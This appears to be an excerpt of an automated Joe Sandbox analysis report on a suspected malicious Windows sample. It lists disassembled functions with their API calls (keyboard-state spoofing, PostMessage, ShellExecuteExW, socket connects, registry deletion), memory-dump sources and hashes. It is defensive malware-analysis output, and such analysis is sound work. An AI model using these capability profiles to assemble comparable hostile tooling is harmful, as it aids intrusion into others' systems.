                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: e797fc1d10b8c903fb7afb48ae27b0eb731fd23d1716dfb5535a3b30ca9d91ac
                                                            • Instruction ID: f5cbea9965481ec35546c840aeba6144444b741ef1e87d697ff3e9fce6773fc9
                                                            • Opcode Fuzzy Hash: e797fc1d10b8c903fb7afb48ae27b0eb731fd23d1716dfb5535a3b30ca9d91ac
                                                            • Instruction Fuzzy Hash: E081DE71508300ABC710EF28CC96EABB7A9FF84718F24491DF555DB2A2DA70ED44CB92
                                                            Function 00811424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c44981fad3c53fc9bbf636e18e77e78150f0a9bebb73de9cf11a00fd48709749
                                                            • Instruction ID: c0c97afef7f2c92ef1c7a137de956dc1524be2fc8aae24b625427c87ec93b885
                                                            • Opcode Fuzzy Hash: c44981fad3c53fc9bbf636e18e77e78150f0a9bebb73de9cf11a00fd48709749
                                                            • Instruction Fuzzy Hash: C1715930900109EFCF04DF98CC49AEEBB79FF85714F148159FA16EA251D734AA91CBA9
                                                            Function 0089B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(017C4D80), ref: 0089B6A5
                                                            • IsWindowEnabled.USER32(017C4D80), ref: 0089B6B1
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0089B795
                                                            • SendMessageW.USER32(017C4D80,000000B0,?,?), ref: 0089B7CC
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 0089B809
                                                            • GetWindowLongW.USER32(017C4D80,000000EC), ref: 0089B82B
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0089B843
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: 3570b9aafcabbb35bcb7dfac911769c1363463648e8b3a476d39504914ce0253
                                                            • Instruction ID: 7d76b49d32db268c95988810f0a0e46febff6054f050cd57ee3a0033ea9b1698
                                                            • Opcode Fuzzy Hash: 3570b9aafcabbb35bcb7dfac911769c1363463648e8b3a476d39504914ce0253
                                                            • Instruction Fuzzy Hash: AF71AC34601208AFDF25AFA4DAD4FAA7BB9FF99300F0C026AE945D7361D731A950CB10
                                                            Function 0088F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0088F75C
                                                            • _memset.LIBCMT ref: 0088F825
                                                            • ShellExecuteExW.SHELL32(?), ref: 0088F86A
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                              • Part of subcall function 0082FEC6: _wcscpy.LIBCMT ref: 0082FEE9
                                                            • GetProcessId.KERNEL32(00000000), ref: 0088F8E1
                                                            • CloseHandle.KERNEL32(00000000), ref: 0088F910
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: cc706c6ecd52ccdb8707e8ca60ece0a0de1e91b835f15418e4cb2f9f26aee9e4
                                                            • Instruction ID: b118ee7c5d16e757deea1b3c3921b873774ca56a550f4ebdd77965222c2c0bb0
                                                            • Opcode Fuzzy Hash: cc706c6ecd52ccdb8707e8ca60ece0a0de1e91b835f15418e4cb2f9f26aee9e4
                                                            • Instruction Fuzzy Hash: 2F617DB5A00619DFCF14EF58C5919AEBBB5FF48310F148469E94AEB352DB30AD80CB91
                                                            Function 0087145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0087149C
                                                            • GetKeyboardState.USER32(?), ref: 008714B1
                                                            • SetKeyboardState.USER32(?), ref: 00871512
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00871540
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0087155F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 008715A5
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008715C8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 71529ae32144de6f3c954a82065054df04a978294cc675f5044ce18a460587cf
                                                            • Instruction ID: acd44a849c90f136c0a7f2f3f26dd73d50397259c1219207a3604d0848ede40b
                                                            • Opcode Fuzzy Hash: 71529ae32144de6f3c954a82065054df04a978294cc675f5044ce18a460587cf
                                                            • Instruction Fuzzy Hash: 3F51E2A06046D539FF3A462C8C49BBA7EAABB46304F0CC489E1D9D9CD6C798DC84D751
                                                            Function 00871276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 008712B5
                                                            • GetKeyboardState.USER32(?), ref: 008712CA
                                                            • SetKeyboardState.USER32(?), ref: 0087132B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00871357
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00871374
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008713B8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008713D9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: cc856a23b98614bb00271e035dd113c4ae4aee6590edf13095f879556a25f000
                                                            • Instruction ID: 18da27a5e439bb849cc1461c2a14728064d3f4d8747b5b12b7b133a9d86114ef
                                                            • Opcode Fuzzy Hash: cc856a23b98614bb00271e035dd113c4ae4aee6590edf13095f879556a25f000
                                                            • Instruction Fuzzy Hash: 7251E3A05086D53DFF3682288C49B7A7EA9FB06304F08C589E1DCCADC6D798EC94E751
                                                            Function 0087589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: eebf0b7253cfd397a9f2d78abfeb2bb4c0b47ae1e49f28cbf9785869e757b905
                                                            • Instruction ID: e1e8c553b8b527a0a79b20f9f9c0ea83514b26f259ccdfc78f5a5cad64a2af1b
                                                            • Opcode Fuzzy Hash: eebf0b7253cfd397a9f2d78abfeb2bb4c0b47ae1e49f28cbf9785869e757b905
                                                            • Instruction Fuzzy Hash: C8418365C20528B6CB10EBB888869CFB7B8FF44710F509966F618E3122E634E755C7E6
                                                            Function 008738AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008738D3,?), ref: 008748C7
                                                              • Part of subcall function 008748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008738D3,?), ref: 008748E0
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 008738F3
                                                            • _wcscmp.LIBCMT ref: 0087390F
                                                            • MoveFileW.KERNEL32(?,?), ref: 00873927
                                                            • _wcscat.LIBCMT ref: 0087396F
                                                            • SHFileOperationW.SHELL32(?), ref: 008739DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: ce49bf79e76c5e887b04b7ef0b4d9d2bce8012684bbb7d2dc91f0584abc3072b
                                                            • Instruction ID: b4e86e716a540493666bc0b909a96a0d65e63b0779abb0ed00ce5dc7c051e691
                                                            • Opcode Fuzzy Hash: ce49bf79e76c5e887b04b7ef0b4d9d2bce8012684bbb7d2dc91f0584abc3072b
                                                            • Instruction Fuzzy Hash: 03417E725083449AC756EF68C881ADBB7E8FF89340F04592EB58EC3165EB74D688CB53
                                                            Function 00897500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00897519
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008975C0
                                                            • IsMenu.USER32(?), ref: 008975D8
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00897620
                                                            • DrawMenuBar.USER32 ref: 00897633
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: 6d571079a3dc373491ce6f2ee78d9f8c8e70e7f3009985fdf7346dec7ebaf722
                                                            • Instruction ID: 3f830714a66ebbac46bc17fc58b1c72fa90392bf9e44cb3025b91341c379afc2
                                                            • Opcode Fuzzy Hash: 6d571079a3dc373491ce6f2ee78d9f8c8e70e7f3009985fdf7346dec7ebaf722
                                                            • Instruction Fuzzy Hash: 7F411575A15609AFDF21EF58D884E9ABBB8FB18314F08812AE915D7250D730AD50CFA0
                                                            Function 0089122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0089125C
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00891286
                                                            • FreeLibrary.KERNEL32(00000000), ref: 0089133D
                                                              • Part of subcall function 0089122D: RegCloseKey.ADVAPI32(?), ref: 008912A3
                                                              • Part of subcall function 0089122D: FreeLibrary.KERNEL32(?), ref: 008912F5
                                                              • Part of subcall function 0089122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00891318
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 008912E0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: 51b15d3c9d0130aa78a55702e10c0c4829bdc5d2ea40d00dc636ceed94860dcf
                                                            • Instruction ID: b9a31b372fe5489c01c55de47dea3b441fe64f218eade1e62fe4d7461314db95
                                                            • Opcode Fuzzy Hash: 51b15d3c9d0130aa78a55702e10c0c4829bdc5d2ea40d00dc636ceed94860dcf
                                                            • Instruction Fuzzy Hash: 4F311C71A0510ABFDF15EB94DC89AFEB7BCFF08300F04016AE511E2251DB749E459AA0
                                                            Function 0089653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0089655B
                                                            • GetWindowLongW.USER32(017C4D80,000000F0), ref: 0089658E
                                                            • GetWindowLongW.USER32(017C4D80,000000F0), ref: 008965C3
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008965F5
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0089661F
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00896630
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0089664A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: bf7aa80fc183d0faa9c98b473558942ebf01bb1616d8b86fb50359bea9bbc615
                                                            • Instruction ID: 844ed078460232eb5cce75d680e05b987e4249570f3aef2b5fbb8d968f9dd548
                                                            • Opcode Fuzzy Hash: bf7aa80fc183d0faa9c98b473558942ebf01bb1616d8b86fb50359bea9bbc615
                                                            • Instruction Fuzzy Hash: 20310230644214AFDF21AF18DC85F553BE1FB5A350F1A02A9F601CB2B6EB61A860DB41
                                                            Function 00886486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008880CB
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008864D9
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008864E8
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00886521
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 0088652A
                                                            • WSAGetLastError.WSOCK32 ref: 00886534
                                                            • closesocket.WSOCK32(00000000), ref: 0088655D
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00886576
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: 560fe491b2ea70851eb21594d250ea1f3bc78c5f9b651af761ef3b6e5dbb9b79
                                                            • Instruction ID: 51fa5a4a8aaac2ffe40ecb328239c90b0717165070745676ddf7ce3b7fa78051
                                                            • Opcode Fuzzy Hash: 560fe491b2ea70851eb21594d250ea1f3bc78c5f9b651af761ef3b6e5dbb9b79
                                                            • Instruction Fuzzy Hash: A931A171600118ABDB10BF64CC85BBE7BADFF44714F044069F94AE7291EB74AD54CBA2
                                                            Function 0086E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0086E0FA
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0086E120
                                                            • SysAllocString.OLEAUT32(00000000), ref: 0086E123
                                                            • SysAllocString.OLEAUT32 ref: 0086E144
                                                            • SysFreeString.OLEAUT32 ref: 0086E14D
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0086E167
                                                            • SysAllocString.OLEAUT32(?), ref: 0086E175
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 875be80ac515ce6a00033cfc6a24130bead5db2fb0326d6a317483a9220270e5
                                                            • Instruction ID: 777d7dc8ae4c571549fbd16c5c40db0baefa2951736a3b5f55ac035ff2ed9234
                                                            • Opcode Fuzzy Hash: 875be80ac515ce6a00033cfc6a24130bead5db2fb0326d6a317483a9220270e5
                                                            • Instruction Fuzzy Hash: 1B219835604108AFDF14AFA8DC88CAB77ECFB09760B158136FA55CB261DA70DC41DB65
                                                            Function 0089783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00811D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00811D73
                                                              • Part of subcall function 00811D35: GetStockObject.GDI32(00000011), ref: 00811D87
                                                              • Part of subcall function 00811D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00811D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008978A1
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008978AE
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008978B9
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008978C8
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008978D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 19bea087da78e1d8afb0f443bc8f3ab2af763f0ab5d82428e2095ec949f8dd53
                                                            • Instruction ID: 0190437af09d8a923b004397630bc3c74cb5f2cfb76a4a4f3db7b0fce27947ba
                                                            • Opcode Fuzzy Hash: 19bea087da78e1d8afb0f443bc8f3ab2af763f0ab5d82428e2095ec949f8dd53
                                                            • Instruction Fuzzy Hash: 36118EB2110219BFEF15AE64CC85EEB7F6DFF08798F054125FA04A2090C7729C21DBA4
                                                            Function 008341C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00834292,?), ref: 008341E3
                                                            • GetProcAddress.KERNEL32(00000000), ref: 008341EA
                                                            • EncodePointer.KERNEL32(00000000), ref: 008341F6
                                                            • DecodePointer.KERNEL32(00000001,00834292,?), ref: 00834213
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoInitialize$combase.dll
                                                            • API String ID: 3489934621-340411864
                                                            • Opcode ID: 5fb6b11b7d018dcbe87287f3dca9a5f7b840687f88472f282ad64f3cf77e63ea
                                                            • Instruction ID: 876c585864ca3d500ed4088295f4dc5dc9b62b77cdf32c7a6968cca486ed3d66
                                                            • Opcode Fuzzy Hash: 5fb6b11b7d018dcbe87287f3dca9a5f7b840687f88472f282ad64f3cf77e63ea
                                                            • Instruction Fuzzy Hash: 34E04FB0691300AFEF206FB4EC0DB043BA5F761706F546636B621E55F2DBBA50919F00
                                                            Function 0083429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008341B8), ref: 008342B8
                                                            • GetProcAddress.KERNEL32(00000000), ref: 008342BF
